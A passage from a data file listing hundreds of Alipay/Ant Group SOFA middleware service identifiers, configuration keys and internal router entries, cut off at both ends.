alue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mordercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clairvoyant.common.service.facade.data.IndicatorDataFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:trsbrain_digitalFinBizRouteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.TaskBeforeCallService:1.0:instsvcmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.ArProtocolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.UCKernelOperatorManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkassetmore.common.service.facade.api.IntegrationQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.api.OrderAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.ShopOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.callback.IsvTaskProcessCallback:1.0:bugscanIsvTaskProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileaix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rassistcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceInstQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bkmth.common.service.facade.service.ImageProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.queryStatisticForFixedDayReadSlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rule.common.base.service.ScriptValidateService:1.0:MODEAUTOSWITCH@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundFileDisposeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:yebplus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.openapi.HostMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.service.facade.api.bankaccountflow.BankAccountFlowDataSourceFacade:1.0:ifundcontrolmodel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.qc.QualificationValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.goldetfprod.common.service.facade.api.PurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.template.TemplateConditionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.184.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inschainproc.common.service.facade.api.InsAMLFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.dom.DomQueryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tscenter.common.service.facade.deviceFp.DeviceIdQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.244.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.ClusterMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.warehouse.plan.common.facade.api.DataAccessibleControlApi:1.0:dpplanning@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.xviewconf:name=com.alipay.xview.conf.drm.XViewConfClientDrm.timeoutForClientConfRefreshLock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:kaleido@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiopbff.common.service.facade.furion.CheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:almspmo-bugatti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.pcreditInstallmentCharge,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:pcreditamount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.recommendation.InsMktProdRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:hyp_offline_data_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.14.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradeguard.common.service.facade.test.LmbMoneyFlowSyncNotificationListenerAutoTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.GeneralCustRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.aoliao.api.DecisionMngManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHbaseConfigResource.hbaseWriteOpen,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.MartMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbx.common.service.facade.TbxDataBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.rebalanceMinChangeOffset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:captain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.20.10.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revol.core.service.facade.RuleProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1259#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.common.service.facade.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.OpenDeviceReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:trafficintelbiz@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmActivityGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.searchengine.SearchEngineSynService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:SearchPortalChangePlanCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:dwuniontrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.ExecutionControlFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.MetaProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.MiniAppBundleInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almanalysis.common.service.facade.api.InstAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.InsItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_10#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchTemplateInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mobileops.ConfigChangeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.spi.adapter.facade.CallbackSpiFacade:1.0:discount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.contractOperateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.query.api.AccenterCategoryRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.SceneStaticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insrenewprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.YebTransInApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchArQueryFacade1:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.uat.UTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.extension.WorkbenchEffluxService:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeChargeQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_MQ_TEST_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.socialcore.facade.taskcenter.SopOperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.airbops:name=com.alipay.airbops.biz.airmng.service.drm.AirProductSignExcuteConfig.unsignMultiOperatorUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.netmockRule:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:csprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.ConsultiveReissueService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.PromotionWayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_templateDeleteProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.client.facade.UserInfoQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.UserAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.node.BotNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.ledger.SupVoucherSummaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:WWW@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.PromoQueryCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.secretary.manager.WorkAssistantRobotManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.ai.AIUtilityBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.point.api.PttransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.datalink.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.LessonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.smartscene.common.facade.location.UserLocationPredictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.217.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.224.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.mcard.McardOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.apipackage.PackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scheduler.common.service.facade.update.SchedulerTaskUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.erecon.common.service.facade.download.api.ErcItemQueryDownLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountReverseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecisioncarina.service.facade.payment.PaymentmngDBFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.order.OrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:newExecuteTaskEndAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fporgassetcenter.common.service.facade.api.TrdStcOrgRltnpMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.card.StockCardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.104.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.variable.facade.VariableValidationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.dummy.DummySecuUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BizCertifyRuleQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationTargetPropertyCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.quotation.drm.QuotationConfigDRMResource.quotationValueCacheSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.26.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.164.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chair.facade.omegakoi.MaterialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsClaimReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_PRODSWITCH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frscenter.common.service.facade.api.RiskFactorDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.PredictStateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkSettleAdjustFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.mashup.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSKUFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.CreativeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.recommend.StockSelectingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.skipBetaProdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.galaxy.XMktDeliveryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:operator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.mmcard.MemberPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bizfundprod.common.service.facade.payment.cashierpay.CreateAndApplyCashierRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.baoxiangw.common.service.packet.InsPacketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.biz.platform.task.complainmessage.ComplainTaskProgressService:1.0:complainTaskProgressService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.identity.ServiceAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finpwm.facade.share.RiskQuestionDealFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.cache.RunningInfoService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.CredibleDataSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huoyan.operator.OperatorDropsyncDataCheckComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:relationconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.nfcc.common.service.facade.limit.H2RpcLimitOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paygrowth.common.service.facade.task.TaskTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:portrait@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloaninsight.biz.shared.warn.WarnDsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.65.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.facade.standard.api.process.ArrangementProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushCommentV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.alipay.fraudmng.core.service.riskcontrol.resource.BatchOperateConfigResource.batchRuleCopySwitchAsynNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.auth_center.common.service.facade.v2.service.AuthService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:orderlink-valid-fee-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.ordercenter.facade.service.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AffiliateRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bccomparacenter.facade.ComParaOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.biz.manager.fuse.FuseManageControlResource.forceRelateFuseStrategyStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.bizprod.common.service.facade.api.user.AppSiteAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:phoenixmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.BusinessTicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.SHAREDATADataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.OrderLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:cn.mybank.security.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebppgw.facade.DownloadFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:pure_zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.aegis.service.repay.RepayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SOFASENTINEL-DIRECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsecu.common.service.facade.api.estimate.FundEstimateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:staragent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.ConferAccountMaintenanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.CommonBuyConfigInnerServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tiyubiz.facade.match.BackstageTiyuMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.59#@#DEFAULT_INSTANCE_ID#@#SOFA_R